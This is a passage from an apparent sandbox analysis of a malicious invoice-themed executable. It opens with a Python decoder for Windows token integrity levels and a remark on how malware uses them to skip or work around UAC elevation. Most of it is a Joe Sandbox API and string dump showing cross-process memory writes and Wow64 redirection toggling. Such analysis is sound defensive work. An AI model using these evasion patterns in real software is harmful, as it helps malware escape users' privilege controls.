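    header = 2 * pointer_size
    sid_str, rid = parse_sid(buf[header:])
    return sid_str, INTEGRITY_NAMES.get(rid, "Unknown(0x%x)" % rid)


def build_label(rid: int, pointer_size: int = 4) -> bytes:
    """Construct a TOKEN_MANDATORY_LABEL buffer for offline testing (not data
    captured from the sample). The PSID field is zeroed because its value is
    irrelevant to the decoder above."""
    sid = bytes([1, 1]) + (16).to_bytes(6, "big") + struct.pack("<I", rid)
    header = b"\0" * pointer_size + struct.pack("<I", SE_GROUP_INTEGRITY | SE_GROUP_INTEGRITY_ENABLED)
    return header.ljust(2 * pointer_size, b"\0") + sid


def demo() -> dict:
    """Decode constructed labels in the 32-bit layout of this sample and in x64 layout."""
    out = {name: integrity_level_from_label(build_label(rid, 4), 4)
           for name, rid in (("low", 0x1000), ("medium", 0x2000), ("high", 0x3000))}
    out["x64_system"] = integrity_level_from_label(build_label(0x4000, 8), 8)
    return out


def query_current_process_integrity() -> Tuple[str, str]:
    """The two-call pattern seen in the API list, via ctypes. Windows only."""
    if sys.platform != "win32":
        raise OSError("GetTokenInformation is only available on Windows")
    import ctypes
    from ctypes import wintypes
    advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.GetCurrentProcess.restype = wintypes.HANDLE
    advapi32.OpenProcessToken.argtypes = [wintypes.HANDLE, wintypes.DWORD, ctypes.POINTER(wintypes.HANDLE)]
    advapi32.GetTokenInformation.argtypes = [wintypes.HANDLE, ctypes.c_int, ctypes.c_void_p,
                                             wintypes.DWORD, ctypes.POINTER(wintypes.DWORD)]
    kernel32.CloseHandle.argtypes = [wintypes.HANDLE]

    token = wintypes.HANDLE()
    if not advapi32.OpenProcessToken(kernel32.GetCurrentProcess(), TOKEN_QUERY, ctypes.byref(token)):
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        needed = wintypes.DWORD(0)
        # Call 1: zero-length buffer; the expected failure tells us the size.
        advapi32.GetTokenInformation(token, TOKEN_INTEGRITY_LEVEL, None, 0, ctypes.byref(needed))
        if ctypes.get_last_error() != ERROR_INSUFFICIENT_BUFFER:
            raise ctypes.WinError(ctypes.get_last_error())
        buf = ctypes.create_string_buffer(needed.value)  # stands in for HeapAlloc
        # Call 2: the sized buffer receives the TOKEN_MANDATORY_LABEL.
        if not advapi32.GetTokenInformation(token, TOKEN_INTEGRITY_LEVEL, buf, needed.value, ctypes.byref(needed)):
            raise ctypes.WinError(ctypes.get_last_error())
        return integrity_level_from_label(buf.raw, ctypes.sizeof(ctypes.c_void_p))
    finally:
        kernel32.CloseHandle(token)


if __name__ == "__main__":
    for name, (sid, level) in demo().items():
        print(f"{name:>10}: {sid} -> {level}")
    if sys.platform == "win32":
        print("this process:", *query_current_process_integrity())
```

A process that reads its own integrity level this way is usually deciding whether it already runs at High or System (and can skip an elevation attempt) or at Medium or Low (and must work around UAC or a broker); the decoded RID is the only field that matters for that decision, which is why the example keeps the rest of the structure opaque.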
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 002AC1F7
                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 002AC20E
                                                                                                                    • MessageBeep.USER32(00000000), ref: 002AC226
                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 002AC242
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 002AC25C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3741023627-0
                                                                                                                    • Opcode ID: 3829c62a89f2cd2a39aa5c15fa3d242cb2cbfe689000965b034e95863faa8922
                                                                                                                    • Instruction ID: 0cce374c1533335acae609213ee1a9c7c20eba3ff8b5eb25a27efd258d96c595
                                                                                                                    • Opcode Fuzzy Hash: 3829c62a89f2cd2a39aa5c15fa3d242cb2cbfe689000965b034e95863faa8922
                                                                                                                    • Instruction Fuzzy Hash: 2C01A73081430497EB206F50EE4EB96B7BCFB01706F10026AA953918E0DBF0AD548B94
                                                                                                                    APIs
                                                                                                                    • EndPath.GDI32(?), ref: 002513BF
                                                                                                                    • StrokeAndFillPath.GDI32(?,?,0028B888,00000000,?), ref: 002513DB
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 002513EE
                                                                                                                    • DeleteObject.GDI32 ref: 00251401
                                                                                                                    • StrokePath.GDI32(?), ref: 0025141C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2625713937-0
                                                                                                                    • Opcode ID: 67b50ac14b24077ebeab38c4dbcd0c305bdd5ef0467eb550050e1a7a4c0b9a19
                                                                                                                    • Instruction ID: faafa4e8806b2c5dadc63b7796bf5636da53c8dd1b35ca7d556aa25254090f94
                                                                                                                    • Opcode Fuzzy Hash: 67b50ac14b24077ebeab38c4dbcd0c305bdd5ef0467eb550050e1a7a4c0b9a19
                                                                                                                    • Instruction Fuzzy Hash: 09F03C30512B0DEBDB125F2AED4C7983FA9A744327F08C225E82A490F1C73189B9DF18
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 002BC432
                                                                                                                    • CoCreateInstance.OLE32(002E2D6C,00000000,00000001,002E2BDC,?), ref: 002BC44A
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                    • CoUninitialize.OLE32 ref: 002BC6B7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 2683427295-24824748
                                                                                                                    • Opcode ID: c505bcb0fa04528f08762429aa4b696eeeb62ede88827aaacfa30e36fabcc69a
                                                                                                                    • Instruction ID: 82da4e70b03bff818979eb0da8363a8c10bf2bb76335e7333e612a962a1129d5
                                                                                                                    • Opcode Fuzzy Hash: c505bcb0fa04528f08762429aa4b696eeeb62ede88827aaacfa30e36fabcc69a
                                                                                                                    • Instruction Fuzzy Hash: 35A16AB1114205AFD300EF64C881EABB7ECEF85355F00492CF9569B1A2EB70EA59CF56
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00270DB6: std::exception::exception.LIBCMT ref: 00270DEC
                                                                                                                      • Part of subcall function 00270DB6: __CxxThrowException@8.LIBCMT ref: 00270E01
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                      • Part of subcall function 00257A51: _memmove.LIBCMT ref: 00257AAB
                                                                                                                    • __swprintf.LIBCMT ref: 00262ECD
                                                                                                                    Strings
                                                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00262D66
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                    • API String ID: 1943609520-557222456
                                                                                                                    • Opcode ID: aaaa1f93e085f2bb1ac5efdadcd28dc49036ff971deb478553ae638d32247b1b
                                                                                                                    • Instruction ID: 0c3ab05f44d4a92014937a6941bff325cc31025f8f337d8f47100a74dbbde61c
                                                                                                                    • Opcode Fuzzy Hash: aaaa1f93e085f2bb1ac5efdadcd28dc49036ff971deb478553ae638d32247b1b
                                                                                                                    • Instruction Fuzzy Hash: 83918E71128612DFCB14EF24D895C6FB7E8EF85714F00491DF8459B2A1EA30EDA8CB56
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00254750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00254743,?,?,002537AE,?), ref: 00254770
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 002BB9BB
                                                                                                                    • CoCreateInstance.OLE32(002E2D6C,00000000,00000001,002E2BDC,?), ref: 002BB9D4
                                                                                                                    • CoUninitialize.OLE32 ref: 002BB9F1
                                                                                                                      • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
                                                                                                                      • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 2126378814-24824748
                                                                                                                    • Opcode ID: fe9133f34e98d822b4b18895f17f9e7c84053a09448407deb1d2a365db6e2e54
                                                                                                                    • Instruction ID: b291905d63fc731f42183037c7dbefc620d0dfac4ccf3192aaa83024392534ce
                                                                                                                    • Opcode Fuzzy Hash: fe9133f34e98d822b4b18895f17f9e7c84053a09448407deb1d2a365db6e2e54
                                                                                                                    • Instruction Fuzzy Hash: 0FA144756242019FCB00DF14C884D6ABBE5FF89314F148998F89A9B3A2CB71EC59CF91
                                                                                                                    APIs
                                                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 002AB4BE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContainedObject
                                                                                                                    • String ID: AutoIt3GUI$Container$%.
                                                                                                                    • API String ID: 3565006973-783795609
                                                                                                                    • Opcode ID: 6439c9c32b4365d73e252201733d5acfd734cd8f383eda19b9d87d880722aa97
                                                                                                                    • Instruction ID: 6bf93f6ef345e21caae683837633921a875c13c289982c2425765ef9b4245cae
                                                                                                                    • Opcode Fuzzy Hash: 6439c9c32b4365d73e252201733d5acfd734cd8f383eda19b9d87d880722aa97
                                                                                                                    • Instruction Fuzzy Hash: 4B916A70610601EFDB15CF64C894B6ABBE9FF4A700F24856DF90ACB292DBB1E851CB50
                                                                                                                    APIs
                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 002750AD
                                                                                                                      • Part of subcall function 002800F0: __87except.LIBCMT ref: 0028012B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorHandling__87except__start
                                                                                                                    • String ID: pow
                                                                                                                    • API String ID: 2905807303-2276729525
                                                                                                                    • Opcode ID: c19b9c4b185c0caf273b4d32b8e26e91d81b368f06fcdf6f4a6e0d60be967d3d
                                                                                                                    • Instruction ID: 6e59fe2f1a44f9b9c01f8cf512fff44631eef889f14959ae0a53b85a39318afb
                                                                                                                    • Opcode Fuzzy Hash: c19b9c4b185c0caf273b4d32b8e26e91d81b368f06fcdf6f4a6e0d60be967d3d
                                                                                                                    • Instruction Fuzzy Hash: 8B517C2493A50386DB517F28C88936EAB949B01710F30CD59E4DD862E9DFF48DFC9B86
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: 3c&$_&
                                                                                                                    • API String ID: 4104443479-1388094336
                                                                                                                    • Opcode ID: 6cdb56a8f151158388650f7cfcb0fabc5f4ec4bc48b7198a83e781d8206d22b9
                                                                                                                    • Instruction ID: c6c7032c2aeb7f6a78cf79d3d31691c7b6fdd427fe4c26a709d4ba3060191969
                                                                                                                    • Opcode Fuzzy Hash: 6cdb56a8f151158388650f7cfcb0fabc5f4ec4bc48b7198a83e781d8206d22b9
                                                                                                                    • Instruction Fuzzy Hash: 93519D7091061A9FCF20CF68C884AAEBBF1FF45304F258529E85AD7250EB31A9A5CF51
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002A9296,?,?,00000034,00000800,?,00000034), ref: 002B14E6
                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002A983F
                                                                                                                      • Part of subcall function 002B1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002A92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 002B14B1
                                                                                                                      • Part of subcall function 002B13DE: GetWindowThreadProcessId.USER32(?,?), ref: 002B1409
                                                                                                                      • Part of subcall function 002B13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002A925A,00000034,?,?,00001004,00000000,00000000), ref: 002B1419
                                                                                                                      • Part of subcall function 002B13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002A925A,00000034,?,?,00001004,00000000,00000000), ref: 002B142F
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002A98AC
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002A98F9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                    • Opcode ID: e280bd88e1f728232816caa312d46e97dba74c5ee79c200d856cd2026b4af82b
                                                                                                                    • Instruction ID: e5714892f4e3dfcc1ba98fcb9ce83606770cd2f5423879b080cb25ffd3adb223
                                                                                                                    • Opcode Fuzzy Hash: e280bd88e1f728232816caa312d46e97dba74c5ee79c200d856cd2026b4af82b
                                                                                                                    • Instruction Fuzzy Hash: 13415B76901219BFCB10DFA4CD95ADEBBB8EF0A340F004099FA55B7181DA706E95CFA0
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,002DF910,00000000,?,?,?,?), ref: 002D79DF
                                                                                                                    • GetWindowLongW.USER32 ref: 002D79FC
                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002D7A0C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long
                                                                                                                    • String ID: SysTreeView32
                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                    • Opcode ID: 82952c7190abdb2d10e50c98fed8d33c7df795e46ac1a601a0682689b2a2b266
                                                                                                                    • Instruction ID: 35ff9d68b6218f08139951bf39370542d86f133d4a01432e21aa290e9308b1b5
                                                                                                                    • Opcode Fuzzy Hash: 82952c7190abdb2d10e50c98fed8d33c7df795e46ac1a601a0682689b2a2b266
                                                                                                                    • Instruction Fuzzy Hash: D731E132224606AFDB118F38DC45BEA77A9EB09334F244726F875932E0E734ED608B50
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002D7461
                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002D7475
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 002D7499
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window
                                                                                                                    • String ID: SysMonthCal32
                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                    • Opcode ID: c8b88c836f27c4e6b25340b06e62f97f9ce97e2a6c66ec6083467ef11c86e6ec
                                                                                                                    • Instruction ID: 0f418cf33f186ca33251248aa0fc4eb72d2c6e6974394d7f30f676e0774af34c
                                                                                                                    • Opcode Fuzzy Hash: c8b88c836f27c4e6b25340b06e62f97f9ce97e2a6c66ec6083467ef11c86e6ec
                                                                                                                    • Instruction Fuzzy Hash: F421A132510219AFDF128F64DC46FEA3B79EF48724F110215FE156B2D0EAB5AC61DBA0
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002D7C4A
                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002D7C58
                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002D7C5F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                    • String ID: msctls_updown32
                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                    • Opcode ID: 4182720bb26a99d64920b9e40b3bf0e2428edba88d5e6bf63f1d59a3d9449998
                                                                                                                    • Instruction ID: d4d584cedcf39eed98c005754cbcef321f082f9cdec349e0858a47ccbf9c2388
                                                                                                                    • Opcode Fuzzy Hash: 4182720bb26a99d64920b9e40b3bf0e2428edba88d5e6bf63f1d59a3d9449998
                                                                                                                    • Instruction Fuzzy Hash: 00215EB5624209AFDB11DF28DCC1DA637ECEF4A364B14405AF9159B3A1DB71EC218BA0
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002D6D3B
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002D6D4B
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002D6D70
Strings
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
APIs
• __snwprintf.LIBCMT ref: 002C3A66
  • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
Strings
Similarity
• API ID: __snwprintf_memmove
• String ID: , $$AUTOITCALLVARIABLE%d$%.
• API String ID: 3506404897-205648231
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002D7772
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002D7787
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 002D7794
Strings
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
APIs
Strings
Similarity
• API ID: __calloc_crt
• String ID: 0$@B1
• API String ID: 3494438863-589020848
APIs
• __lock.LIBCMT ref: 00279B94
  • Part of subcall function 00279C0B: __mtinitlocknum.LIBCMT ref: 00279C1D
  • Part of subcall function 00279C0B: EnterCriticalSection.KERNEL32(00000000,?,00279A7C,0000000D), ref: 00279C36
• __updatetlocinfoEx_nolock.LIBCMT ref: 00279BA4
  • Part of subcall function 00279100: ___addlocaleref.LIBCMT ref: 0027911C
  • Part of subcall function 00279100: ___removelocaleref.LIBCMT ref: 00279127
  • Part of subcall function 00279100: ___freetlocinfo.LIBCMT ref: 0027913B
Strings
Similarity
• API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
• String ID: 80$80
• API String ID: 547918592-2001377372
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00254B83,?), ref: 00254C44
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00254C56
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-1355242751
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00254BD0,?,00254DEF,?,003152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00254C11
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00254C23
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,002D1039), ref: 002D0DF5
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002D0E07
Strings
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
                                                                                                                    APIs
